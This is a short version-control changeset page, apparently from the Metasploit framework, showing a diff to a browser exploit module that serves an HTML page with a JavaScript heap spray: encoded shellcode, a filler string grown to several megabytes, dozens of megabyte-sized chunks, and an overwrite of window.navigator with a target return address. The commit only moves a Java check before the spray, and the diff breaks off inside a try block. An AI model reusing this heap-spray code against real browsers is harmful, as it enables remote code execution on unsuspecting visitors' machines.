Navigation

Changeset 5558

Timestamp:

07/19/08 00:03:01 (3 months ago)

Author:

egypt

Message:

don't hang the browser building the exploit buffer if we can't exploit it

Files:

r4646	r5558
91	91	return if ((p = regenerate_payload(cli)) == nil)
92	92
93		print_status("Sending ~~exploit~~ to #{cli.peerhost}:#{cli.peerport}...")
	93	print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
94	94	send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
95	95
…	…
106	106	<script>
107	107	function Exploit() {
108
109		var shellcode = unescape("#{enc_code}");
110		var b = unescape("#{target['Fill']}");
111		while (b.length <= 0x400000) b+=b;
	108	if (window.navigator.javaEnabled) {
	109	var shellcode = unescape("#{enc_code}");
	110	var b = unescape("#{target['Fill']}");
	111	while (b.length <= 0x400000) b+=b;
112	112
113		var c = new Array();
114		for (var i =0; i<36; i++) {
115		c[i] =
116		b.substring(0, 0x100000 - shellcode.length) + shellcode +
117		b.substring(0, 0x100000 - shellcode.length) + shellcode +
118		b.substring(0, 0x100000 - shellcode.length) + shellcode +
119		b.substring(0, 0x100000 - shellcode.length) + shellcode;
120		}
	113	var c = new Array();
	114	for (var i =0; i<36; i++) {
	115	c[i] =
	116	b.substring(0, 0x100000 - shellcode.length) + shellcode +
	117	b.substring(0, 0x100000 - shellcode.length) + shellcode +
	118	b.substring(0, 0x100000 - shellcode.length) + shellcode +
	119	b.substring(0, 0x100000 - shellcode.length) + shellcode;
	120	}
121	121
122
123		~~if (window.navigator.javaEnabled) {~~
124	122	window.navigator = (#{target['Ret']} / 2);
125	123	try {